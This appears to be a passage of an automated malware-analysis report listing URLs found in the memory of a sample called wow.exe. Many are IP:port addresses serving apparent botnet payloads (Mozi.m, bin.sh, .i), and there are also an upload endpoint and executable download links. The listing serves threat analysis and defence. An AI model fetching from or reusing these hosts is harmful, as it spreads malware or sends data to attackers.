                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.34.209.216:59068/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://37.34.209.216:59068/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://41.77.74.90:10702/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://42.4.23.178:60729/i
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://42.55.1.127:35513/bin.sh
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://42.55.60.188:52535/i
                            Source: wow.exe, 00000009.00000003.2994891214.000001D42D52C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2479967055.000001D42D554000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2342292239.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2448526134.000001D42CDFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2562218180.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2351696699.000001D42CB7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2563582335.000001D42CC81000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C440000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2549690962.000001D42CC1B000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2901512124.000001D428D1C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2572286803.000001D42C440000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3066267715.000001D42D556000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2549690962.000001D42CC80000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2342292239.000001D42CC80000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2879381009.000001D42CE01000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2349081758.000001D42C410000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3003548070.000001D42D556000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2807337493.000001D428D1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.138.183.226/upload/1531Ghttp://plunder.dedyn.io/upload/1531
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.151.56.42:28186/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.97.137.50:64550/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://49.142.114.242:6220/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://49.142.114.242:6220/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://60.22.87.18:33036/bin.sh
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://60.246.106.122:33463/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://60.253.126.4:50663/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://61.70.80.82:58511/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://61.9.53.86:43016/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://64.140.100.194:44920/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://64.140.100.201:44920/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://64.140.99.97:44920/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://70.166.89.181:26293/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.175.25.81:53673/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://76.76.195.174:62922/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://78.188.215.66:57861/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://78.29.19.18:3200/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://78.30.234.163:54495/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://8.138.96.41:10050/dlc_update.data
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.19.172.50:57652/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://80.210.35.140:7607/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://81.16.242.236:28115/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://81.16.254.181:31516/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.117.197.102:19001/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.193.120.99:4958/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.147.127.49:16660/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://83.218.189.21:5195/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://84.22.136.158:32729/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.187.82.120:41465/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://86.101.187.225:34824/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.197.107.203:52364/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.119.193.17:10462/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.135.26.83:32710/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://88.247.206.153:21475/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.190.76.126:4729/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.216.100.166:30359/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.218.42.242:51547/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://89.231.14.137:2282/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.92.98.94:32971/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.114.191.82:3230/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://93.118.104.33:41338/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://93.176.52.107/Quas_Autre_ncrypt.exe
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://94.52.86.60:27955/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.158.175.214:23270/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.170.119.57:1271/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.170.203.178:46806/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://98.103.171.36:19021/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aosafrica.co.za/5j1ae/ApMYYqsc6Q3p5Y/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aulist.com/GvHr-MMJ5U8ZN2kc5aoq_NkxhpRvvh-t9/
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://buscascolegios.diit.cl/txs9e9.zip
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E1F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertS
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                            Source: wow.exe, 00000000.00000003.2181471915.0000028D65E13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162433359.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2368311174.000001D42C341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: wow.exe, 00000000.00000003.2163522569.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161992111.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163168293.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2184976666.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163858197.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162205557.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163269107.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2160072899.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2181826496.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2187292399.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2188883507.0000028D65E1F000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2162596858.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2182817052.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2161348312.0000028D65E11000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2172584780.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2164104977.0000028D65E1E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2185661471.0000028D65E13000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000000.00000003.2163423605.0000028D65E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cd.textfiles.com/hmatrix/Data/hack1226.exe
